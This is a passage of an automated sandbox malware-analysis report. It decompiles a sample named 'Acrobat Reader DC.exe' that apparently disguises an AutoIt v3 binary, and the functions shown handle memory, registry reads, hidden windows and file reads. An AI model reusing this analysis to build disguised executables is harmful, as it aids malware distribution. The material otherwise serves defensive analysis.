							__eflags = _t16;
							if(_t16 != 0) {
								return _t16->i(_v0);
							}
						}
						return _t16;
					} else {
						continue;
					}
					L11:
				}
				return _t11;
				goto L11;
			}












                                  0x004115d7
                                  0x004115d7
                                  0x004115ee
                                  0x004115f1
                                  0x004115f9
                                  0x00000000
                                  0x00000000
                                  0x004115e4
                                  0x004115ea
                                  0x004115ec
                                  0x004115fd
                                  0x0041160e
                                  0x00411610
                                  0x00411610
                                  0x00411617
                                  0x0041161f
                                  0x00411626
                                  0x00411630
                                  0x00411636
                                  0x0041163b
                                  0x00411640
                                  0x0041164e
                                  0x00411651
                                  0x00411656
                                  0x00411661
                                  0x00411667
                                  0x00411669
                                  0x00411671
                                  0x00411677
                                  0x00411679
                                  0x00000000
                                  0x0041167e
                                  0x00411679
                                  0x00411681
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004115ec
                                  0x004115fc
                                  0x00000000

                                  APIs
                                  • _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • std::exception::exception.LIBCMT ref: 00411626
                                  • std::exception::exception.LIBCMT ref: 00411640
                                  • __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                  • String ID: ,*H$4*H$@fI
                                  • API String ID: 615853336-1459471987
                                  • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                  • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1375 4102b0-4102c5 SHGetMalloc 1376 4102cb-4102da SHGetDesktopFolder 1375->1376 1377 425dfd-425e0e call 433244 1375->1377 1378 4102e0-41031a call 412fba 1376->1378 1379 41036b-410379 1376->1379 1387 410360-410368 1378->1387 1388 41031c-410331 SHGetPathFromIDListW 1378->1388 1379->1377 1385 41037f-410384 1379->1385 1387->1379 1389 410351-41035d 1388->1389 1390 410333-41034a call 412fba 1388->1390 1389->1387 1390->1389
                                  C-Code - Quality: 62%
                                  			E004102B0(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				short _v24;
				char _v544;
				char _v1068;
				char* _t21;
				intOrPtr* _t24;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr* _t34;
				void* _t38;
				void* _t55;
				void* _t57;

				_t55 = __edi;
				_t38 = __ebx;
				_t21 =  &_v8;
				__imp__SHGetMalloc(_t21); // executed
				if(_t21 != 0) {
					L9:
					E00433244(_t55, _t38, 0x105);
					return 0;
				} else {
					_t57 = 0; // executed
					__imp__SHGetDesktopFolder( &_v12, __esi); // executed
					if(_t21 == 0) {
						E00412FBA( &_v544, __ebx, 0x104);
						_v24 = 0;
						_t29 = _v12;
						_t31 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0xc))))(_t29, 0, 0,  &_v544,  &_v20,  &_v16, 0); // executed
						if(_t31 == 0) {
							__imp__SHGetPathFromIDListW(_v16,  &_v1068); // executed
							_t57 = _t31;
							if(_t57 != 0) {
								E00412FBA(__edi,  &_v1068, 0x104);
								 *((short*)(__edi + 0x208)) = 0;
							}
							_t34 = _v8;
							 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x14))))(_t34, _v16);
						}
						_t32 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 8))))(_t32);
					}
					_t24 = _v8;
					 *((intOrPtr*)( *((intOrPtr*)( *_t24 + 8))))(_t24);
					if(_t57 == 0) {
						goto L9;
					} else {
						return 1;
					}
				}
			}



















                                  0x004102b0
                                  0x004102b0
                                  0x004102b9
                                  0x004102bd
                                  0x004102c5
                                  0x00425dfd
                                  0x00425e04
                                  0x00425e0e
                                  0x004102cb
                                  0x004102d0
                                  0x004102d2
                                  0x004102da
                                  0x004102ed
                                  0x00410307
                                  0x0041030b
                                  0x00410316
                                  0x0041031a
                                  0x00410327
                                  0x0041032d
                                  0x00410331
                                  0x00410340
                                  0x0041034a
                                  0x0041034a
                                  0x00410351
                                  0x0041035e
                                  0x0041035e
                                  0x00410360
                                  0x00410369
                                  0x00410369
                                  0x0041036b
                                  0x00410374
                                  0x00410379
                                  0x00000000
                                  0x0041037f
                                  0x00410384
                                  0x00410384
                                  0x00410379

                                  APIs
                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                  • _wcsncpy.LIBCMT ref: 004102ED
                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                  • _wcsncpy.LIBCMT ref: 00410340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                  • String ID: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 3170942423-3542460094
                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1393 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1396 427190-4271ae RegQueryValueExW 1393->1396 1397 40e4eb-40e4f0 1393->1397 1398 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1396->1398 1399 42721a-42722a RegCloseKey 1396->1399 1404 427210-427219 call 436508 1398->1404 1405 4271f7-42720e call 402160 1398->1405 1404->1399 1405->1404
                                  C-Code - Quality: 85%
                                  			E0040E4C0(void* __esi, void* __eflags) {
				int _v8;
				void* _v12;
				char* _v20;
				void* __ebx;
				void* __edi;
				long _t23;
				long _t34;
				signed int _t37;
				int _t42;
				void* _t57;
				char* _t58;

				E00403350(__esi);
				_t23 = RegOpenKeyExW(0x80000001, L"Software\\AutoIt v3\\AutoIt", 0, 1,  &_v12); // executed
				if(_t23 == 0) {
					_t42 = 0;
					__eflags = RegQueryValueExW(_v12, L"Include", 0, 0, 0,  &_v8);
					if(__eflags == 0) {
						_push(_t57);
						_push( ~(0 | __eflags > 0x00000000) | (_v8 + 0x00000001) * 0x00000002);
						E0043652F(__eflags,  &_v20, E004115D7(_t57, __esi, __eflags));
						_t58 = _v20;
						_t55 = _v12;
						_t34 = RegQueryValueExW(_v12, L"Include", 0, 0, _t58,  &_v8);
						__eflags = _t34;
						if(_t34 == 0) {
							_t37 = _v8 >> 1;
							_v8 = _t37;
							__eflags = 0;
							 *((short*)(_t58 + _t37 * 2)) = 0;
							E00402160(__esi, _t58, _t55, _t58);
							_t42 = 1;
						}
						E00436508( &_v20);
					}
					RegCloseKey(_v12);
					return _t42;
				} else {
					return 0;
				}
			}














                                  0x0040e4c6
                                  0x0040e4dd
                                  0x0040e4e5
                                  0x004271a4
                                  0x004271ac
                                  0x004271ae
                                  0x004271c0
                                  0x004271c5
                                  0x004271d3
                                  0x004271d8
                                  0x004271db
                                  0x004271ed
                                  0x004271f3
                                  0x004271f5
                                  0x004271fa
                                  0x004271fc
                                  0x004271ff
                                  0x00427201
                                  0x00427209
                                  0x0042720e
                                  0x0042720e
                                  0x00427214
                                  0x00427219
                                  0x0042721e
                                  0x0042722a
                                  0x0040e4eb
                                  0x0040e4f0
                                  0x0040e4f0

                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: QueryValue$CloseOpen
                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                  • API String ID: 1586453840-614718249
                                  • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                  • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1410 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                  C-Code - Quality: 100%
                                  			E00410570() {
				struct HWND__* _t2;
				struct HWND__* _t3;
				int _t6;

				_t2 = CreateWindowExW(0, L"AutoIt v3", L"AutoIt v3", 0xcf0000, 0x80000000, 0x80000000, 0x12c, 0x64, 0, 0,  *0x497520, 0); // executed
				 *0x497518 = _t2; // executed
				_t3 = CreateWindowExW(0, L"edit", 0, 0x50b008c4, 0, 0, 0, 0, _t2, 1,  *0x497520, 0); // executed
				 *0x497514 = _t3; // executed
				ShowWindow( *0x497518, 0); // executed
				_t6 = ShowWindow( *0x497518, 0); // executed
				return _t6;
			}






                                  0x004105a5
                                  0x004105c9
                                  0x004105ce
                                  0x004105df
                                  0x004105e4
                                  0x004105ee
                                  0x004105f1

                                  APIs
                                  • CreateWindowExW.USER32 ref: 004105A5
                                  • CreateWindowExW.USER32 ref: 004105CE
                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$CreateShow
                                  • String ID: AutoIt v3$edit
                                  • API String ID: 1584632944-3779509399
                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040F250(short* __edx, char* __esi, void* _a4, short* _a8, intOrPtr _a12) {
				int _v8;
				void* _v12;
				int* _t19;
				long _t22;
				signed int _t27;
				int _t44;

				 *__esi = 0;
				_t19 = RegOpenKeyExW(_a4, __edx, 0, 1,  &_v12); // executed
				if(_t19 != 0) {
					return 0;
				} else {
					_t44 = _a12 + _a12;
					_v8 = _t44;
					_t22 = RegQueryValueExW(_v12, _a8, _t19, _t19, __esi,  &_v8); // executed
					if(_t22 != 0) {
						RegCloseKey(_v12);
						return 0;
					} else {
						_t27 = _v8 >> 1;
						_v8 = _t27;
						if(_t27 >= _a12) {
							 *((short*)(_t44 + __esi - 2)) = 0;
						} else {
							 *((short*)(__esi + _t27 * 2)) = 0;
						}
						RegCloseKey(_v12); // executed
						return 1;
					}
				}
			}









                                  0x0040f25f
                                  0x0040f267
                                  0x0040f26f
                                  0x00425e1c
                                  0x0040f275
                                  0x0040f288
                                  0x0040f28b
                                  0x0040f28e
                                  0x0040f296
                                  0x0040f2c9
                                  0x0040f2d6
                                  0x0040f298
                                  0x0040f29b
                                  0x0040f29d
                                  0x0040f2a3
                                  0x00425e1f
                                  0x0040f2a9
                                  0x0040f2ab
                                  0x0040f2ab
                                  0x0040f2b5
                                  0x0040f2c2
                                  0x0040f2c2
                                  0x0040f296

                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Close$OpenQueryValue
                                  • String ID: Control Panel\Mouse
                                  • API String ID: 1607946009-824357125
                                  • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                  • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                  • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                  • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414ABA Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E00414ABA(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				char _t89;
				signed int _t96;
				signed int _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				signed int _t109;
				char* _t110;
				signed int _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t110 = _a4;
				_t108 = _a8;
				_t123 = _a12;
				_v12 = _t110;
				_v8 = _t108;
				if(_t123 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t131 = _t110;
					if(_t110 != 0) {
						_t126 = _a20;
						__eflags = _t126;
						if(_t126 == 0) {
							L9:
							__eflags = _t108 - 0xffffffff;
							if(_t108 != 0xffffffff) {
								_t82 = E00412F40(_t110, 0, _t108);
								_t127 = _t127 + 0xc;
							}
							__eflags = _t126;
							if(__eflags == 0) {
								goto L3;
							} else {
								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t124 = _t123 * _a16;
								__eflags =  *(_t126 + 0xc) & 0x0000010c;
								_v20 = _t124;
								_t109 = _t124;
								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t126 + 0x18));
								}
								__eflags = _t124;
								if(_t124 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t126 + 0xc) & 0x0000010c;
										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t109 - _v16;
											if(_t109 < _v16) {
												_t89 = E0041D8F3(_t109, _t124, _t126); // executed
												__eflags = _t89 - 0xffffffff;
												if(_t89 == 0xffffffff) {
													L45:
													return (_t124 - _t109) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L41:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E00412F40(_a4, 0, _a8);
													}
													 *((intOrPtr*)(E00417F77(__eflags))) = 0x22;
													L4:
													E00417F25();
													goto L5;
												}
												_v12 = _v12 + 1;
												 *_v12 = _t89;
												_t109 = _t109 - 1;
												_t65 =  &_v8;
												 *_t65 = _v8 - 1;
												__eflags =  *_t65;
												_v16 =  *((intOrPtr*)(_t126 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t96 = 0x7fffffff;
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t96 = _t109;
												}
											} else {
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t50 = _t109 % _v16;
													__eflags = _t50;
													_t120 = _t50;
													_t101 = _t109;
												} else {
													_t120 = 0x7fffffff % _v16;
													_t101 = 0x7fffffff;
												}
												_t96 = _t101 - _t120;
											}
											__eflags = _t96 - _v8;
											if(_t96 > _v8) {
												goto L41;
											} else {
												_push(_t96);
												_push(_v12);
												_push(E00414139(_t126)); // executed
												_t98 = E0041DFCC(_t109, _t124, _t126, __eflags); // executed
												_t127 = _t127 + 0xc;
												__eflags = _t98;
												if(_t98 == 0) {
													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
													goto L45;
												}
												__eflags = _t98 - 0xffffffff;
												if(_t98 == 0xffffffff) {
													L44:
													_t72 = _t126 + 0xc;
													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
													__eflags =  *_t72;
													goto L45;
												}
												_v12 = _v12 + _t98;
												_t109 = _t109 - _t98;
												_v8 = _v8 - _t98;
												goto L39;
											}
										}
										_t104 =  *(_t126 + 4);
										__eflags = _t104;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L44;
										}
										_t125 = _t109;
										__eflags = _t109 - _t104;
										if(_t109 >= _t104) {
											_t125 = _t104;
										}
										__eflags = _t125 - _v8;
										if(_t125 > _v8) {
											goto L41;
										} else {
											E0041E0C2(_v12, _v8,  *_t126, _t125);
											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
											 *_t126 =  *_t126 + _t125;
											_v12 = _v12 + _t125;
											_t109 = _t109 - _t125;
											_t127 = _t127 + 0x10;
											_v8 = _v8 - _t125;
											_t124 = _v20;
										}
										L39:
										__eflags = _t109;
									} while (_t109 != 0);
									goto L40;
								}
							}
						}
						_t82 = (_t82 | 0xffffffff) / _t123;
						__eflags = _a16 - _t82;
						if(_a16 <= _t82) {
							goto L13;
						}
						goto L9;
					}
					L3:
					 *((intOrPtr*)(E00417F77(_t131))) = 0x16;
					goto L4;
				}
			}


























                                  0x00414ac2
                                  0x00414ac6
                                  0x00414acb
                                  0x00414ace
                                  0x00414ad1
                                  0x00414ad6
                                  0x00414af2
                                  0x00000000
                                  0x00414ade
                                  0x00414ade
                                  0x00414ae0
                                  0x00414af9
                                  0x00414afc
                                  0x00414afe
                                  0x00414b0c
                                  0x00414b0c
                                  0x00414b0f
                                  0x00414b15
                                  0x00414b1a
                                  0x00414b1a
                                  0x00414b1d
                                  0x00414b1f
                                  0x00000000
                                  0x00414b21
                                  0x00414b28
                                  0x00414b2b
                                  0x00000000
                                  0x00000000
                                  0x00414b2d
                                  0x00414b2d
                                  0x00414b31
                                  0x00414b38
                                  0x00414b3b
                                  0x00414b3d
                                  0x00414b47
                                  0x00414b3f
                                  0x00414b42
                                  0x00414b42
                                  0x00414b4e
                                  0x00414b50
                                  0x00414c30
                                  0x00000000
                                  0x00414b56
                                  0x00414b56
                                  0x00414b56
                                  0x00414b5d
                                  0x00414ba3
                                  0x00414ba3
                                  0x00414ba6
                                  0x00414c05
                                  0x00414c0b
                                  0x00414c0e
                                  0x00414c62
                                  0x00000000
                                  0x00414c68
                                  0x00414c10
                                  0x00414c14
                                  0x00414c38
                                  0x00414c38
                                  0x00414c3c
                                  0x00414c46
                                  0x00414c4b
                                  0x00414c53
                                  0x00414aed
                                  0x00414aed
                                  0x00000000
                                  0x00414aed
                                  0x00414c19
                                  0x00414c1c
                                  0x00414c21
                                  0x00414c22
                                  0x00414c22
                                  0x00414c22
                                  0x00414c25
                                  0x00000000
                                  0x00414c25
                                  0x00414ba8
                                  0x00414bac
                                  0x00414bcd
                                  0x00414bd2
                                  0x00414bd4
                                  0x00414bd6
                                  0x00414bd6
                                  0x00414bae
                                  0x00414bb5
                                  0x00414bb7
                                  0x00414bc4
                                  0x00414bc4
                                  0x00414bc4
                                  0x00414bc7
                                  0x00414bb9
                                  0x00414bbb
                                  0x00414bbe
                                  0x00414bbe
                                  0x00414bc9
                                  0x00414bc9
                                  0x00414bd8
                                  0x00414bdb
                                  0x00000000
                                  0x00414bdd
                                  0x00414bdd
                                  0x00414bde
                                  0x00414be8
                                  0x00414be9
                                  0x00414bee
                                  0x00414bf1
                                  0x00414bf3
                                  0x00414c70
                                  0x00000000
                                  0x00414c70
                                  0x00414bf5
                                  0x00414bf8
                                  0x00414c5e
                                  0x00414c5e
                                  0x00414c5e
                                  0x00414c5e
                                  0x00000000
                                  0x00414c5e
                                  0x00414bfa
                                  0x00414bfd
                                  0x00414bff
                                  0x00000000
                                  0x00414bff
                                  0x00414bdb
                                  0x00414b5f
                                  0x00414b62
                                  0x00414b64
                                  0x00000000
                                  0x00000000
                                  0x00414b66
                                  0x00000000
                                  0x00000000
                                  0x00414b6c
                                  0x00414b6e
                                  0x00414b70
                                  0x00414b72
                                  0x00414b72
                                  0x00414b74
                                  0x00414b77
                                  0x00000000
                                  0x00414b7d
                                  0x00414b86
                                  0x00414b8b
                                  0x00414b8e
                                  0x00414b90
                                  0x00414b93
                                  0x00414b95
                                  0x00414b98
                                  0x00414b9b
                                  0x00414b9b
                                  0x00414c28
                                  0x00414c28
                                  0x00414c28
                                  0x00000000
                                  0x00414b56
                                  0x00414b50
                                  0x00414b1f
                                  0x00414b05
                                  0x00414b07
                                  0x00414b0a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00414b0a
                                  0x00414ae2
                                  0x00414ae7
                                  0x00000000
                                  0x00414ae7

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                  • String ID:
                                  • API String ID: 4048096073-0
                                  • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                  • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                  • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                  • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F520 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040F520(short* __eax, void* __esi, void* __fp0, intOrPtr _a4) {
				intOrPtr _v36;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v84;
